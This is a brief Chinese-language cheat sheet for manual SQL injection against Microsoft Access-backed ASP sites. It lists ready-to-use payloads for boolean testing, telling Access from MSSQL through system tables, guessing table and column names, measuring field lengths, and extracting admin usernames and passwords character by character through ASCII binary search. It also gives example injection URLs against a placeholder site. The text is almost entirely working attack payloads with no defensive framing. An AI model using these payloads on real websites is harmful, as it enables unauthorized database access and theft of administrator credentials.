access基本手工注入

判断

1=1,1=2

1>2,1<2

判断数据库类型

and (select count (*) from msysobjects)>0 异常access

and (select count (*) from sysobjects)>0 mssql正常

猜表名

and 0<>(select count(*) from 表名)

猜列名

and 0<>(select count(列名) from 表名)

猜字段长度

and (select top 1 len(username) from admin)>0

and (select top 1 len(username) from admin)>1

and (select top 1 len(username) from admin)>2

and (select top 1 len(username) from admin)>3

如果>5返回错误页面，>4返回正确页面就说明字段的长度是5

猜字段值

and (select asc(mid(username,1,1)) from admin)>96

and (select asc(mid(username,2,1)) from admin)>96

ascii是从0-255，使用2分法比较快。

字符型注入
http://www.hacker.com/default.asp?title=111111' and 1=(select top 1 count(*) from Admin where Asc(mid(password,3,1))="&s&") and '1'='1
http://www.hacker.com/default.asp?title=111111' and 1=1 and '1'='1 （替换中间的and1=1即可）

要加引号，后门要多加一个and‘1’=‘1，注意最后不关门。原select语句中有引号。